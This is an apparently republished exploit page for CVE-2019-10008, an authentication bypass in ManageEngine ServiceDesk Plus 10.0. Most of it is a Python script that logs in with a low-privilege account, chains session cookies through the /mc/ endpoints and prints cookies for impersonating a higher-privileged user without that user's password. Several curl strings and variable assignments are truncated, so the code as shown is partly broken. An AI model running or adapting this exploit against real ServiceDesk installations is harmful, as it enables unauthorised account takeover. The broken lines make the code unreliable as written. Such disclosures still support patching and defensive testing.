Manage Engine ServiceDesk Plus 10.0 – Privilege Escalation

  • 作者: Ata Hakçıl, Melih Kaan Yıldız
    日期: 2019-04-05
  • 类别:
  • 来源:
  • #!/usr/bin/python
    # Exploit Title: Manage Engine ServiceDesk Plus Version <10.0 Privilege Escalation
    # Date: 30-03-2019
    # Exploit Author: Ata Hakçıl, Melih Kaan Yıldız
    # Vendor: ManageEngine
    # Vendor Homepage:
    # Product: Service Desk Plus
    # Version: 10.0
    # Tested On: Kali Linux
    # CVE: CVE-2019-10008
    # Platform: JSP
    # Timeline
    # 22 march 2019: Discovery
    # 24 march 2019: CVE id reserved for CVE-2019-10008
    # 26 march 2019: First contact with vendor
    # 5april 2019: First publication
    # 10 april 2019: Vendor confirmation
    # 11 april 2019: Vendor released a fix (version 10017)
    # Reference link:
    import os
    import re
    # How to use: Change the host, low_username, low_password and high_username variables depending on what you have.
    # Low username and password is an account you have access to. high_username is account you want to authenticate as.
    # After running the script, it will output you the cookies that you can set on your browser to login to the high_username without password.
    #Host ip address + port
    #set to https if needed
    url = "http://" + host
    #Username with credentials you have
    #username you want to login as
    print("\033[1;37mUrl: \033[1;32m" + url)
    print("\033[1;37mUser with low priv: \033[1;32m" + low_username + ':' + low_password)
    print("\033[1;37mUser to bypass authentication to: \033[1;32m" + high_username)
    print("\033[1;32mGetting a session id\033[1;37m")
    # Get index page to capture a session id
    curl = "curl -i -s -k-X $'GET' \
    -H $'Host: "+host+"'-H $'Referer: "+url+"/' -H $'Connection: close'\
    out = os.popen('/bin/bash -c "' + curl+'"').read()
    sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
    print("\033[1;31mLogging in with low privilege user\033[1;37m")
    #Attempt login post request 
    curl="curl -i -s -k -X $'POST' -H $'Host: "+host+"'\
     -H $'Referer: "+url+"/'\
     -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \
     -b $'JSESSIONID="+sessid+"' \
     --data-binary $'j_username="+low_username+"&j_password="+low_password+"&LDAPEnable=false&\
     dynamicUserAddition_status=true&localAuthEnable=true&logonDomainName=-1&loginButton=Login&checkbox=checkbox' \
    out = os.popen('/bin/bash -c "' + curl+'"').read()
    #Instead of following redirects with -L, following manually because we don't need all the transactions.
    curl="curl -i -s -k -X $'GET' -H $'Host: "+host+"'\
     -H $'Referer: "+url+"/'\
     -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \
     -b $'JSESSIONID="+sessid+"' \
    out = os.popen('/bin/bash -c "' + curl+'"').read()
    print("\033[1;32mCaptured authenticated cookies.\033[1;37m")
    sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
    sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]
    grbl = re.findall("(?<=Set-Cookie: )[^=]*=[^;]*",out)
    grbl2 = []
    for cookie in grbl:
    	cl = cookie.split('=')
    	if cl[0]!='JSESSIONID' and cl[0]!='JSESSIONIDSSO' and cl[0]!='_rem':
    curl = "curl -i -s -k -X $'GET' \
    -H $'Host: "+host+"' \
    -H $'Cookie: JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    -b $'JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    out = os.popen('/bin/bash -c "' + curl+'"').read()
    sessid2 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
    print("\033[1;32mCaptured secondary sessid.\033[1;37m")
    print("\033[1;31mDoing the magic step 1.\033[1;37m")
    curl = "curl -i -s -k -X $'GET' \
    -H $'Host: "+host+"' \
    	-H $'Referer: "+url+"/mc/' \
    	-H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    	-b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    out = os.popen('/bin/bash -c "' + curl+'"').read()
    print("\033[1;31mDoing the magic step 2.\033[1;37m")
    curl = "curl -i -s -k -X $'GET' \
    -H $'Host: "+host+"' \
    -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    out = os.popen('/bin/bash -c "' + curl+'"').read()
    sessid3 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
    sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]
    curl = "curl -i -s -k -X $'GET' \
    -H $'Host: "+host+"' \
    -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    out = os.popen('/bin/bash -c "' + curl+'"').read()
    sessid4 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
    curl = "curl -i -s -k -X $'POST' \
    -H $'"+host+"' \
    -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \
    -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    --data-binary $'j_username="+high_username+"&j_password=bypassingpass&DOMAIN_NAME=' \
    out = os.popen('/bin/bash -c "' + curl+'"').read()
    curl = "curl -i -s -k -X $'GET' \
    -H $'Host: "+host+"' \
    -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \
    -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    -H $'Upgrade-Insecure-Requests: 1' \
    -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    out = os.popen('/bin/bash -c "' + curl+'"').read()
    sessidhigh = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
    sessidssohigh = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]
    print("\033[1;31mCaptured target session.Set following cookies on your browser.\033[1;37m")
    print("JSESSIONID=" + sessidhigh)
    print("JSESSIONIDSSO=" + sessidssohigh)
    print(grbl2[0] + "=" + grbl2[1])
    print(grbl2[2] + "=" + grbl2[3])